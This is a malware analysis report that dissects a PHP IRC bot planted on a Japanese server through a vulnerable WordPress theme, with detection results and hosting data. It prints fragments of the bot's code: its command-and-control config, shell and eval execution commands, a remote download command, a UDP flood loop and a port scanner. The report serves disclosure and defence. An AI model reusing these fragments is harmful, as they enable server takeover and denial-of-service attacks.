#OCJP-040 New Variant PHP/IRC DoS Tools (Win32/Posix)

1. ==============================
2. Operation Cleanup Japan
3. report: #OCJP-040
4. Base: http://unixfreaxjp.blogspot.jp/2012/05/ocjp-040.html
5. VT: https://www.virustotal.com/file/530d50212bf404cf82a40532ec90f90ea9a6533e3d38a233f8d34c15d10a0e8c/analysis/1335907672/
6. ==============================
7. This is the PHP IRC/Bot Malware found in Japan IDC Server w/vulnerable Wordpress theme plugin.
8. Currently is under investigation under #OCJP case : OCJP-040
9.  
10. Below is the proof of malicious activities of the object:
11. ==================
12. IRC base Bot:
13. ==================
14. var $config = array("server"=>"irc.s4l1ty.info",
15. "port"=>6667,
16. "pass"=>"zero",
17. "prefix"=>"ZERO",
18. "maxrand"=>8,
19. "chan"=>"#zero",
20. "key"=>"",
21. "modes"=>"+iB-x",
22. "password"=>"zero",
23. "trigger"=>".",
24. "hostauth"=>"*" // * for any hostname
25.  
26. ==================
27. DNS Lookup
28. ==================
29. config.inc.txt(15): * .dns <IP|HOST> //dns lookup
30. config.inc.txt(206): case "dns":
31. config.inc.txt(212): $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
32. config.inc.txt(216): $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
33.  
34. ==================
35. SERVER REMOTE EXECUTION
36. ==================
37. Designed to execute the shell command of the unix or Windows OS if having PHP installed:
38.  
39. * .sexec <cmd> // uses shell_exec() //execute a command
40. * .exec <cmd> // uses exec() //execute a command
41. * .cmd <cmd> // uses popen() //execute a command
42. * .php <php code> // uses eval() //execute php code
43.  
44. ==================
45. DOWNLOADER
46. ==================
47. Download interface to the hacked system:
48. * .download <URL> <filename> //download a file
49. else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
50.  
51.  
52. ==================
53. HACKER GROUP ATTACK TOOLS
54. ==================
55. This tools belongs to this hacker group:
56. #crew@corp. since 2003
57. edited by: devil__ and MEIAFASE <admin@xdevil.org> <meiafase@pucorp.org>
58. Friend: LP <fuckerboy@sercret.gov>
59.  
60.  
61. ==================
62. INFECTION NOTIFICATION
63. ==================
64. Reporting the infection to the vulnerable machine thru IRC channel:
65. $this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
66. $this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
67.  
68. ==================
69. DoS / DDoS ATTACK TOOLS
70. ==================
71. Three attack tools functions:
72.  
73. TCP FLOOD
74. -----------
75. * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
76. case "tcpflood":
77. if(count($mcmd)>5)
78. {$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);}
79. function tcpflood($host,$packets,$packetsize,$port,$delay)
80. {$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
81. $packet = "";
82. for($i=0;$i<$packetsize;$i++)
83.  
84.  
85. UDP FLOOD
86. -----------
87. * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
88. function udpflood($host,$packetsize,$time) {
89. $this->privmsg($this->config['chan'],"[\2Attack Iniciado com sucesso!\2]");
90. $packet = "";
91. for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
92. $timei = time();$i = 0;
93. while(time()-$timei < $time) {
94. $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
95. fwrite($fp,$packet);fclose($fp);$i++;
96.  
97. PORT SCANNING
98. -----------
99. * .pscan <host> <port> //port scan
100. case "pscan": // .pscan 6667
101. if(count($mcmd) > 2)
102. { if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
103. $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
104. else
105. $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
106.  
107. ==================
108. Portuguesel language used a lot:
109. ==================
110. Impossivel mandar e-mail.");
111. ensagem enviada para \2"
112. Nao foi possivel fazer o download. Permissao negada.
113.  
114. ==================
115. SPYWARE
116. ==================
117. Can send email messages to send infected system credential via IRC, can be used for spamming purpose:
118. if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \n
119. {$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");}
120. else {$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");}
121. $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
122. $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
123.  
124. ================================
125. MALWARE SOURCE
126. ================================
127.  
128. --14:34:56-- http://happymeme.com/uzumaki//wp-content/themes/autofocus/config.inc.txt
129. => `config.inc.txt'
130. Resolving happymeme.com... 112.78.112.187
131. Connecting to happymeme.com|112.78.112.187|:80... connected.
132. HTTP request sent, awaiting response... 200 OK
133. Length: 23,375 (23K) [text/plain]
134. 100%[====================================>] 23,375 81.18K/s
135. 14:34:59 (80.91 KB/s) - `config.inc.txt' saved [23375/23375]
136.  
137.  
138. ================================
139. VIRUS TOTAL
140. ================================
141. https://www.virustotal.com/file/530d50212bf404cf82a40532ec90f90ea9a6533e3d38a233f8d34c15d10a0e8c/analysis/1335907672/
142. nProtect : Trojan.Dropper.RYF
143. K7AntiVirus : Backdoor
144. VirusBuster : PHP.Shellbot.J
145. F-Prot : PHP/Pbot.B
146. Symantec : PHP.Backdoor.Trojan
147. Norman : PHP/Ircbot.BBPH
148. TrendMicro-HouseCall : BKDR_PHPBOT.SM
149. Avast : PHP:IRCBot-AB [Trj]
150. ClamAV : PHP.Bot
151. Kaspersky : Backdoor.PHP.Pbot.a
152. BitDefender : Trojan.Dropper.RYF
153. Sophos : Troj/PHPBot-F
154. Comodo : Backdoor.PHP.Pbot.A
155. F-Secure : Trojan.Dropper.RYF
156. DrWeb : PHP.BackDoor.14
157. VIPRE : Backdoor.PHP.Pbot.b (v) (not malicious)
158. AntiVir : PHP/PBot.A.6
159. TrendMicro : BKDR_PHPBOT.SM
160. McAfee-GW-Edition : Heuristic.BehavesLike.JS.Suspicious.G
161. Emsisoft : Backdoor.PHP.Pbot!IK
162. eTrust-Vet : PHP/Pbot.D
163. Jiangmin : Trojan/Script.Gen
164. Microsoft : Trojan:PHP/Flader.A
165. GData : Trojan.Dropper.RYF
166. Commtouch : PHP/Pbot.B
167. AhnLab-V3 : PHP/Pbot
168. VBA32 : Backdoor.PHP.Pbot.a
169. PCTools : Malware.PHP-Backdoor
170. Rising : Trojan.Script.HTML.Agent.ab
171. Ikarus : Backdoor.PHP.Pbot
172. Fortinet : PHP/Pbot.AK!tr.bdr
173. AVG : PHP/BackDoor.K
174. Panda : Bck/Pbot.B
175.  
176. ================================
177. NETWORK SOURCE
178. ================================
179.  
180. Routing (AS)
181. -----------
182.  
183. IP: 112.78.112.187
184. inetnum: 112.78.112.0 - 112.78.112.255
185. netname: SAKURA-NET
186. descr: SAKURA Internet Inc.
187. country: JP
188. admin-c: KT749JP
189. tech-c: KW419JP
190. remarks: This information has been partially mirrored by APNIC from
191. remarks: JPNIC. To obtain more specific information, please use the
192. remarks: JPNIC WHOIS Gateway at
193. remarks: http://www.nic.ad.jp/en/db/whois/en-gateway.html or
194. remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client
195. remarks: defaults to Japanese output, use the /e switch for English
196. remarks: output)
197. changed: apnic-ftp@nic.ad.jp 20090303
198. changed: apnic-ftp@nic.ad.jp 20090331
199. source: JPNIC
200.  
201.  
202. 112.78.112.0/20
203. SAKURA-C (4/OSAKA) SAKURA Internet // WEST JAPAN BACKBONE
204. 1-8-15 Kyutaro-cho, Chuo Osaka 541-0056, Japan
205.  
206. AS9371
207. SAKURA-C SAKURA Internet // WEST JAPAN BACKBONE
208. Sakaisuji Honmachi Bldg. 9F 1-8-14 Minami-Honmachi,
209. Chuo-ku Osaka 541-0054, Japan
210.  
211.  
212. Domain
213. -----------
214.  
215. Domain Name: happymeme.com
216. Created On: 2007-02-25 13:40:54.0
217. Last Updated On: 2012-02-27 21:37:36.0
218. Expiration Date: 2013-02-25 04:40:54.0
219. Status: ACTIVE
220. Registrant Name: Whois Privacy Protection Service
221. Registrant Organization: paperboy and co.
222. Registrant Street1: 2-7-21 Tenjin Chuo-ku
223. Registrant Street2: Tenjin Prime 8F
224. Registrant City: Fukuoka-shi
225. Registrant State: Fukuoka
226. Registrant Postal Code: 8100001
227. Registrant Country: JP
228. Registrant Phone: 81-927137999
229. Registrant Fax: 81-927137944
230. Tech Email: privacy@whoisprivacyprotection.info
231. Name Server: ns1.dns.ne.jp
232. Name Server: ns2.dns.ne.jp
233.  
234. --------------------------------------------------
235. Host names sharing IP with A records is under the
236. same risk w/ the current findings (112 items)
237. --------------------------------------------------
238. 194964s.com
239. 2103kakaku.com
240. aeru21.com
241. aeruzo.com
242. aeruzo.net
243. aitaiyoo.com
244. aitaizo.com
245. aitaizo.net
246. anzen-shisan.com
247. anzen-toushi.com
248. b-jays.net
249. biyo-neosta.com
250. boku-uma.com
251. cafebuono.net
252. carnavi-neosta.com
253. chanel-neosta.com
254. chusho-ma.biz
255. cosmo-support.com
256. cucina-style.com
257. cutie-eggs.com
258. daftbrain.com
259. dankai-club.com
260. daveswebworks.com
261. draxn.net
262. drbeverlynelson.com
263. earthworks1.com
264. ed3s.net
265. enyasuita.com
266. extank.com
267. fukuirin.com
268. fx-toushi.biz
269. gaika-yokin.org
270. gakushi110.com
271. gan-kenko.com
272. gooddieter.org
273. gucci-neosta.com
274. hajikunshop.com
275. happyguide.biz
276. happyguide.info
277. happymailz.com
278. happymailz.net
279. happymeme.com
280. hlj93.com
281. hpmls.net
282. ichikawayuu.com
283. iheya-genkimura.org
284. iirufa.com
285. japangoodsplaza.com
286. jewelry-neosta.com
287. ji-joutatsu.com
288. kanakana-piano.com
289. kineyakatsuroku.com
290. koi-iro.com
291. kojimatsubasa.com
292. koshunyujob.com
293. kotaninene.com
294. kounojimusyo.com
295. loaddarthtrader.com
296. lumiere4.com
297. luxy-party.com
298. m2051.com
299. macj-log.com
300. mail.nagasaka-web.net
301. mail.s-smile.net
302. marujyohome.com
303. mild7-1.net
304. morigen.info
305. morita29.com
306. nagasaka-web.net
307. newsharaku.com
308. nibo6.com
309. nitoroy.com
310. npo-bsk.com
311. npo-hima.net
312. okamotoann.com
313. onyanco.com
314. oonoyohei.com
315. oota-amaharashi.jp
316. ozakikana.com
317. penki-nurikae.com
318. potyari.biz
319. recorder-neosta.com
320. redrox.net
321. reiki-a.com
322. reiki-dream.net
323. rightsangyou.com
324. ryuzo-nakata.com
325. s-smile.net
326. sakaidaiki.com
327. sankei-inc.com
328. sekengaku.org
329. sekiaya.com
330. sheadream.com
331. shibataindustries.com
332. shimadadaiki.com
333. shisan-unyou.info
334. smileagefan.com
335. t-zei.jp
336. ton-kichi.net
337. toushi-fx.net
338. uchiyamahinata.com
339. www.h-sketch.com
340. www.oota-amaharashi.jp
341. www.penki-nurikae.com
342. www.t-zei.jp
343. xn--torr3dy20axh7a.com (.com)
344. yamacho-club.com
345. yen-energy.com
346. yoke-kichijoji.com
347. yokohamahikari.com
348. yosapark-saribaba.com
349. yurai-seitai.net
350. ------
351. ZeroDay Japan http://0day.jp
352. OPERATION CLEANUP JAPAN | #OCJP
353. Analyst: Hendrik ADRIAN アドリアン・ヘンドリック Malware Researcher VT/ twitter/google: @unixfreaxjp
354. sponsored by: 株式会社ケイエルジェイテック http://www.kljtech.com